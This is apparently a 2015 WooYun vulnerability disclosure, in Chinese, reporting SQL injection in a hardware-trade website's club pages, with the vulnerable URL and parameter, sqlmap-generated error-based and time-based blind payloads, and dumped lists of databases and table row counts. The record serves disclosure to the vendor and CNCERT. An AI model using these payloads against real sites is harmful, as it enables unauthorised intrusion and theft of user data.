当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130445

漏洞标题:全球五金网SQL注入导致全网数据沦陷

相关厂商:杭州宏创电子商务有限公司

漏洞作者: 路人甲

提交时间:2015-07-30 23:04

修复时间:2015-09-18 09:56

公开时间:2015-09-18 09:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开

简要描述:

全球五金网SQL注入导致全网数据沦陷

详细说明:

http://club.wjw.cn/Channel/Club/ClubList.aspx?CategoryID=-1&Area=&SortBy=-1 (GET)

漏洞证明:

一堆数据。你们懂的
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: Area
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: CategoryID=-1&Area=-1576 OR 8606=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(106)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8606=8606) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(115)+CHAR(109)+CHAR(100)+CHAR(113)))&SortBy=-1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: CategoryID=-1&Area=-5379 OR 3665=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&SortBy=-1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [28]:
[*] bmoa
[*] bmoa2
[*] bmoa2012
[*] EN_CMS
[*] EnEnterprise
[*] HC_Cache
[*] HC_CMS
[*] HC_HHR2012
[*] hc_hhr_ddc
[*] hc_hhr_log
[*] HC_HHR_Notice
[*] HC_Recording
[*] HC_SAAS_CRM
[*] HC_ServicePlan
[*] HC_ServicePlan_Log
[*] HC_Tuan
[*] HC_WIKI
[*] kft
[*] master
[*] model
[*] msdb
[*] SpaceBuilder
[*] tempdb
[*] Toy_Cache
[*] Toy_Enterprise
[*] Toy_Member
[*] Toy_OA
[*] wjw_special
Database: SpaceBuilder
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.wl_GalleryPostMetaData | 324462 |
| dbo.wl_Referrals | 232302 |
| dbo.wl_UserPointRecords | 224272 |
| dbo.wl_Urls | 223470 |
| dbo.wl_ItemsForIndex | 192582 |
| dbo.wl_BlogPosts | 56674 |
| dbo.wl_ItemsInUserTags | 56107 |
| dbo.wl_BlogThreads | 55667 |
| dbo.wl_ForumPosts | 34272 |
| dbo.wl_ForumThreads | 25206 |
| dbo.wl_GalleryThreads | 18333 |
| dbo.wl_GalleryPosts | 18176 |
| dbo.wl_EmailQueue | 18031 |
| dbo.wl_GalleryPostAttachments | 17548 |
| dbo.wl_Statistics_User | 16385 |
| dbo.wl_Users | 16385 |
| dbo.wl_PersonUserProfile | 16384 |
| dbo.wl_vw_PersonUsers_FullUser | 16384 |
| dbo.wl_BlogSections | 16380 |
| dbo.wl_GallerySections | 16380 |
| dbo.wl_FileSections | 16379 |
| dbo.wl_UserVisits | 11080 |
| dbo.wl_BlogRatings | 6801 |
| dbo.wl_UserTags | 6748 |
| dbo.wl_SiteTags | 6425 |
| dbo.wl_GalleryPostsInCategories | 6256 |
| dbo.wl_ForumPostAttachments | 5479 |
| dbo.wl_UserLinks | 3061 |
| dbo.wl_UsersOnline | 2464 |
| dbo.wl_GalleryRatings | 2420 |
| dbo.wl_ClubCommendedBlogThreads | 2173 |
| dbo.wl_UserAvatar | 2055 |
| dbo.wl_MessageThreads | 1692 |
| dbo.wl_UserBookmarks | 1330 |
| dbo.wl_ClubCommendedGalleryThreads | 1239 |
| dbo.wl_GalleryPostCategories | 1227 |
| dbo.wl_Bookmarks | 1187 |
| dbo.wl_UserLinkCategories | 1141 |
| dbo.wl_FilePosts | 765 |
| dbo.wl_Contacts | 738 |
| dbo.wl_Friends | 734 |
| dbo.wl_FileThreads | 707 |
| dbo.wl_BookmarkComments | 667 |
| dbo.wl_FilePostAttachments | 636 |
| dbo.wl_UserPrivacySettings | 615 |
| dbo.wl_Advertisings | 605 |
| dbo.wl_ClubMembers | 485 |
| dbo.wl_CommendedItems | 485 |
| dbo.wl_ForumSections | 439 |
| dbo.wl_Areas | 375 |
| dbo.wl_JobSorts | 369 |
| dbo.wl_Censorship | 359 |
| dbo.wl_BlogPostAttachments | 293 |
| dbo.wl_FavoriteUsers | 262 |
| dbo.wl_Clubs | 229 |
| dbo.wl_MemberAppraisements | 158 |
| dbo.wl_BookmarkVotes | 151 |
| dbo.wl_DisallowedNames | 146 |
| dbo.wl_ClubCommendedBookmarks | 138 |
| dbo.wl_EventPosts | 129 |
| dbo.wl_FileRatings | 111 |
| dbo.wl_ClubLinks | 103 |
| dbo.wl_ClubLinkCategories | 86 |
| dbo.wl_ClubCommendedFileThreads | 57 |
| dbo.wl_Events | 56 |
| dbo.wl_Smilies | 55 |
| dbo.wl_UserPointItems | 55 |
| dbo.wl_ForumModerators | 52 |
| dbo.wl_FilePostCategories | 49 |
| dbo.wl_EventPostAttachments | 43 |
| dbo.wl_FilePostsInCategories | 42 |
| dbo.wl_MessageReplies | 41 |
| dbo.wl_PointItems | 29 |
| dbo.wl_UserPrivacySpecialSettings | 29 |
| dbo.wl_UsersInRoles | 28 |
| dbo.wl_ProductPermissions | 17 |
| dbo.wl_EventCategories | 16 |
| dbo.wl_ForumRatings | 15 |
| dbo.wl_Roles | 15 |
| dbo.wl_ClubCategories | 11 |
| dbo.wl_CommendedItemTypes | 9 |
| dbo.wl_CommendedUsers | 8 |
| dbo.wl_CommendedUserTypes | 1 |
| dbo.wl_HotSetting | 1 |
| dbo.wl_PostAttachments_Temp | 1 |
| dbo.wl_SiteSettings | 1 |
| dbo.wl_TaskRunningLog | 1 |
+------------------------------------+---------+
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| dbo.uc | 312662 |
| dbo.amember | 76945 |
| dbo.pworkplan | 66374 |
| dbo.v_workPlan | 66374 |
| dbo.vdeptPlan | 66374 |
| dbo.pworkplan_u | 43849 |
| dbo.note | 18180 |
| dbo.company_uc | 13385 |
| dbo.dnote | 13149 |
| dbo.companyLevelLog | 9521 |
| dbo.dcompany | 8632 |
| dbo.note_c | 8486 |
| dbo.company | 4968 |
| dbo.company_area | 4968 |
| dbo.company_area2 | 4968 |
| dbo.pipeicompany | 4968 |
| dbo.玻璃网所有客户 | 4968 |
| dbo.cantact_company | 4251 |
| dbo.ccontact | 4251 |
| dbo.company_first_contact | 4120 |
| dbo.compnay_ccontact_first | 4120 |
| dbo.dopost | 4120 |
| dbo.dq | 4120 |
| dbo.cuser | 3204 |
| dbo.玻璃网客户联系人联系方式 | 3204 |
| dbo.vipcompany | 2645 |
| dbo.aa | 2499 |
| dbo.bb | 2499 |
| dbo.cc | 2499 |
| dbo.workinfo | 2499 |
| dbo.workinfo_c | 2499 |
| dbo.workinfo_viewforzx | 2499 |
| dbo.area | 2321 |
| dbo.cgsarea | 2321 |
| dbo.vipcompany_user | 1907 |
| dbo.company_vip | 1637 |
| dbo.work_vip | 1462 |
| dbo.nmg_work_yip | 1138 |
| dbo.company_vip_nmg | 1053 |
| dbo.users | 837 |
| dbo.userinfo | 309 |
| dbo.userinfousers | 309 |
| dbo.stnote | 295 |
| dbo.stnote_c | 295 |
| dbo.new | 292 |
| dbo.cservice | 206 |
| dbo.nmg_work_wz | 198 |
| dbo.work_wz | 176 |
| dbo.work_web | 161 |
| dbo.nmg_work_web | 145 |
| dbo.meeting | 125 |
| dbo.buycompany | 123 |
| dbo.buycompanyview | 123 |
| dbo.vc | 111 |
| dbo.v_expireContract | 94 |
| dbo.job | 87 |
| dbo.work_bill | 73 |
| dbo.nmg_work_bill | 62 |
| dbo.vca | 61 |
| dbo.rb | 52 |
| dbo.cservice_c | 43 |
| dbo.getmubiao | 42 |
| dbo.paimin | 42 |
| dbo.paimin1 | 42 |
| dbo.spm | 42 |
| dbo.spm1 | 42 |
| dbo.spmyear | 42 |
| dbo.subclass | 42 |
| dbo.work_bookbill | 42 |
| dbo.usertalk | 41 |
| dbo.duserinfo | 36 |
| dbo.jsb | 35 |
| dbo.c_c_vip22 | 34 |
| dbo.myVipCompany | 34 |
| dbo.service_myvip | 34 |
| dbo.v_myvipcompany | 34 |
| dbo.work_post | 34 |
| dbo.forvipcom | 33 |
| dbo.c_c_vip | 27 |
| dbo.c_c_vip2 | 27 |
| dbo.vip_info | 27 |
| dbo.bm | 26 |
| dbo.nmg_work_post | 25 |
| dbo.match | 23 |
| dbo.question | 21 |
| dbo.wz_info | 16 |
| dbo.VIEW1 | 15 |
| dbo.Yw_type | 12 |
| dbo.filetable | 11 |
| dbo.nmg_work_software | 11 |
| dbo.work_spread | 11 |
| dbo.p1 | 10 |
| dbo.paiminyear | 10 |
| dbo.companyLevel | 9 |
| dbo.leaveNote | 7 |
| dbo.ServiceItem | 7 |
| dbo.webglym | 7 |
| dbo.ym | 7 |
| dbo.zs | 7 |
| dbo.v_leaveNote | 6 |
| dbo.web_info | 6 |
| dbo.classify | 5 |
| dbo.post_info | 5 |
| dbo.newtype | 4 |
| dbo.zxnote | 4 |
| dbo.filetype | 3 |
| dbo.match_buycompany | 3 |
| dbo.web_tg | 3 |
| dbo.webgl | 3 |
| dbo.hometype | 2 |
| dbo.tasksub | 2 |
| dbo.work_billsort | 2 |
| dbo.xsjl | 2 |
| dbo.zhzj | 2 |
| dbo.月业务员业绩统计 | 2 |
| dbo.bill_info | 1 |
| dbo.home | 1 |
| dbo.home_type | 1 |
| dbo.lsxsjl | 1 |
| dbo.snote | 1 |
| dbo.sub | 1 |
| dbo.sypic | 1 |
+----------------------------+---------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-08-04 09:55

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无